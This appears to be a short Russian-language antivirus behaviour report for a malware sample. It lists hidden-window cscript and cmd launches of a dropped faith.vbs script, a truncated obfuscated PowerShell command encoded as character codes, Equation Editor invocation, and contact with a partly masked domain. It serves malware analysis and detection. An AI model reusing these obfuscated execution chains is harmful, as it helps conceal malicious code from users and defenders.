Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\faith.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\faith.vbs AC
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $0AD78791BE2682794276AD50D6D6C9286925E4FF1C85F0D6AFD40CAD33342785C783325D7AE25E34FE32790C919185E43=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,10...
- %TEMP%\faith.vbs
- 'pr#####luciones.com.mx':443
- DNS ASK pr#####luciones.com.mx
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\faith.vbs AC' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $0AD78791BE2682794276AD50D6D6C9286925E4FF1C85F0D6AFD40CAD33342785C783325D7AE25E34FE32790C919185E43=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,10...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\svchost.exe' -k DcomLaunch -p -s PlugPlay
- '%WINDIR%\syswow64\cmd.exe' /c sc query wcncsvc >> AC